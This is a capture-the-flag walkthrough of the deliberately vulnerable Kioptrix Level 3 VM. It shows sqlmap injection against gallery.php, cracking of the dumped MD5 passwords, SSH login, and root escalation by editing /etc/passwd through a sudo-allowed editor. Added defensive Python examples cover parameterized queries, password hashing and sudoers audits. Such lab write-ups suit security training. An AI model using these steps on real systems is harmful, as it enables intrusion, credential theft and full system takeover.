vulnhub Walkthrough: Kioptrix Level3

This is a memo of what I studied while aiming to become a security engineer, written as a complete beginner, so some of it may be wrong.
It is a walkthrough of Kioptrix Level 3, an intentionally vulnerable VM from vulnhub.

vulnhub information





Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358


PortScan:


It looks like ssh and Apache are running.

Service   Version
ssh       OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
http      Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)


root@kali:~# nmap -sS -sV 192.168.56.77
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 17:13 JST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns 
Nmap scan report for 192.168.56.77
Host is up (0.00050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 08:00:27:94:85:21 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.83 seconds

Enumeration:



I enumerate the directories on the web server. Accessing gallery/gallery.php turned up a SQL injection.
Because the images did not load properly, I added a hosts entry for kioptrix3.com.

root@kali:~# dirb http://kioptrix3.com/gallery/ -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun May 10 17:41:34 2020
URL_BASE: http://kioptrix3.com/gallery/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://kioptrix3.com/gallery/ ----
+ http://kioptrix3.com/gallery/g.php (CODE:500|SIZE:3143)                                              
+ http://kioptrix3.com/gallery/gallery.php (CODE:200|SIZE:1654)                                        
+ http://kioptrix3.com/gallery/index.php (CODE:500|SIZE:5651)                                          
+ http://kioptrix3.com/gallery/login.php (CODE:500|SIZE:1998)                                          
+ http://kioptrix3.com/gallery/logout.php (CODE:500|SIZE:2085)                                         
+ http://kioptrix3.com/gallery/p.php (CODE:500|SIZE:1483)                                              
+ http://kioptrix3.com/gallery/photos.php (CODE:500|SIZE:1483)                                         
+ http://kioptrix3.com/gallery/profile.php (CODE:500|SIZE:1560)                                        
+ http://kioptrix3.com/gallery/recent.php (CODE:500|SIZE:2441)                                         
+ http://kioptrix3.com/gallery/register.php (CODE:500|SIZE:725)                                        
+ http://kioptrix3.com/gallery/search.php (CODE:500|SIZE:725)                                          
+ http://kioptrix3.com/gallery/slideshow.php (CODE:500|SIZE:725)                                       
+ http://kioptrix3.com/gallery/tags.php (CODE:500|SIZE:3212)                                           
+ http://kioptrix3.com/gallery/vote.php (CODE:200|SIZE:32)                                             

-----------------
END_TIME: Sun May 10 17:41:39 2020
DOWNLOADED: 4612 - FOUND: 14



Looking through the other pages for the parameter that triggers the SQL injection in gallery.php, it turned out to be id.

gallery/gallery.php?id=1&sort=views#photos
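To show why id=test breaks the page and how the id and sort parameters should be handled instead, here is an added Python example (not code from the original walkthrough or from the Gallarific application) that uses an in-memory SQLite table as a stand-in for the gallery database; the table layout and the sort allow-list are assumptions.

```python
import sqlite3

# Constructed stand-in for the gallery database; the schema is an assumption.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE photos(id INTEGER, title TEXT, views INTEGER);
        INSERT INTO photos VALUES (1, 'first', 10), (2, 'second', 5);
    """)
    return con

# ORDER BY targets cannot be bound as parameters, so the sort= value is
# mapped through an allow-list instead of being copied into the statement.
ALLOWED_SORT = {"views": "views", "id": "id"}

def query_vulnerable(con, photo_id, sort):
    # The pattern behind gallery.php?id=test: request values are spliced
    # straight into the SQL text, so non-numeric input becomes SQL syntax.
    sql = f"SELECT id, title FROM photos WHERE id={photo_id} ORDER BY {sort}"
    return con.execute(sql).fetchall()

def query_hardened(con, photo_id, sort):
    # Validate the type, bind the value, allow-list the identifier.
    try:
        photo_id = int(photo_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    column = ALLOWED_SORT.get(sort)
    if column is None:
        raise ValueError("unsupported sort column")
    sql = f"SELECT id, title FROM photos WHERE id=? ORDER BY {column}"
    return con.execute(sql, (photo_id,)).fetchall()

def try_query(fn, con, photo_id, sort):
    """Run fn and report the outcome so the two behaviours can be compared."""
    try:
        return ("ok", fn(con, photo_id, sort))
    except (sqlite3.Error, ValueError) as exc:
        return ("rejected", type(exc).__name__)

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "test", "1 OR 1=1"):
        print(value, try_query(query_vulnerable, db, value, "views"),
              try_query(query_hardened, db, value, "views"))
```

The vulnerable form surfaces a database error for id=test and returns every row for a tautology, while the hardened form rejects both before any SQL runs.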



Exploitation:



This time I use sqlmap.
I will also write up a version that does not use sqlmap separately.

root@kali:~# sqlmap -url kioptrix3.com/gallery/gallery.php?id=test --dbs
[17:50:43] [INFO] fetching database names
[17:50:43] [INFO] used SQL query returns 3 entries
[17:50:43] [INFO] retrieved: 'information_schema'
[17:50:43] [INFO] retrieved: 'gallery'
[17:50:43] [INFO] retrieved: 'mysql'
available databases [3]:                                                                               
[*] gallery
[*] information_schema
[*] mysql

root@kali:~# sqlmap -url kioptrix3.com/gallery/gallery.php?id=test -D gallery --dump

do you want to use common password suffixes? (slow!) [y/N] y
[17:55:02] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[17:55:02] [INFO] starting 2 processes 
[17:55:32] [INFO] cracked password 'Mast3r' for user 'dreg'                                            
[17:55:40] [INFO] cracked password 'starwars' for user 'loneferret'                                    
Database: gallery                                                                                      
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+
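An added example, not from the original post: it reproduces what sqlmap's dictionary attack relied on, namely that dev_accounts stores bare, unsalted MD5 (the dumped hashes are exactly md5 of the cracked passwords), and contrasts it with a salted, iterated PBKDF2 hash that a password-storage audit should expect to see instead. The wordlist is constructed; the hash values are the ones dumped above.

```python
import hashlib
import hmac
import os

# Rows as dumped from dev_accounts above (hash values copied from the page).
DUMPED_ROWS = [
    ("dreg", "0d3eccfb887aabd50f243b3f155c0f85"),
    ("loneferret", "5badcaf789d3d1d09794d8f021f40f0e"),
]

# Constructed mini wordlist standing in for the dictionary sqlmap used.
WORDLIST = ["password", "Mast3r", "starwars", "letmein"]

def weak_md5_accounts(rows, wordlist):
    """Return (user, word) for rows whose stored value is bare md5(word)."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return [(user, table[h]) for user, h in rows if h in table]

def hash_password(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256; a per-user salt defeats precomputed tables."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(parts[2]), int(parts[1]))
    return hmac.compare_digest(digest.hex(), parts[3])
```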

Now that I have a user ID and password, I tried ssh and was able to connect.

kali@kali:~$ ssh [email protected]
[email protected] password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:                                                              
http://help.ubuntu.com/
Last login: Sun May 10 13:59:26 2020 from 192.168.56.65
loneferret@Kioptrix3:~$ 

Privilege Escalation:



Poking around, I found a file called CompanyPolicy.README. It seems that sudo ht can be run without a password.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
Running it with sudo gave an xterm error, so I fixed that.

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht              
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm-color
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

This time I add a user to /etc/passwd.
Before adding it with ht, I generate a password hash with openssl.
Once the hash is generated, all that remains is to create the user in /etc/passwd with ht and switch to it with su.

root@kali:~# openssl passwd -1 -salt hoge pass123
$1$hoge$7LUHELCYa/UiDzW5z823E1
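As an added defensive example (not from the walkthrough), the following Python audits a constructed /etc/passwd and a constructed sudoers line for the two conditions this escalation relies on: the NOPASSWD rule granting a file editor (the sudo -l output above) and an extra uid-0 account whose hash sits directly in /etc/passwd (the openssl hash above). The editor list and the one-rule-per-line sudoers parser are simplifying assumptions.

```python
import re

# Constructed sample /etc/passwd: the real root line plus an account added
# the way this walkthrough does it (uid 0, openssl MD5-crypt hash inline).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
hoge:$1$hoge$7LUHELCYa/UiDzW5z823E1:0:0::/root:/bin/bash
"""

# Constructed sudoers line matching the 'sudo -l' output shown above.
SAMPLE_SUDOERS = "loneferret ALL=(root) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht\n"

# Assumed, illustrative list of programs that read or write arbitrary files
# when run as root; extend it for your own environment.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "less", "more"}

def audit_passwd(text):
    """Flag extra uid-0 accounts and hashes stored in /etc/passwd itself."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("malformed", line))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append(("extra_uid0", user))
        if pw not in ("x", "*", "!", ""):
            findings.append(("hash_in_passwd", user))
    return findings

def audit_sudoers(text):
    """Simplified parser: one 'user host=(runas) [TAG:] cmd, cmd' rule per line."""
    findings = []
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+\S+=\(([^)]*)\)\s+(?:(\S+):\s*)?(.*)$", line)
        if not m:
            continue
        user, _runas, tag, cmds = m.groups()
        for cmd in (c.strip() for c in cmds.split(",")):
            if cmd.startswith("!"):
                # sudoers(5) itself warns that negating commands is not an
                # effective denylist; the editor rule still yields root.
                findings.append(("negation_not_a_denylist", user, cmd))
            elif tag == "NOPASSWD" and cmd.rsplit("/", 1)[-1] in FILE_EDITORS:
                findings.append(("nopasswd_editor", user, cmd))
    return findings
```

Both findings would also fire on a live host after this walkthrough, so a periodic diff of /etc/passwd and of sudo -l output per user is the simplest detection.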



Privilege escalation succeeded.


root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt 
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Was not that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~# 

Disclaimer



This article contains security content intended to improve understanding of attacks and defensive skills in information security. The author accepts no responsibility whatsoever for any damage or loss arising from use of the contents of this article.
Using the contents of this article to attack third-party individuals or organizations may be punishable by law, so please only target environments that you own, and never environments owned by other people or organizations.
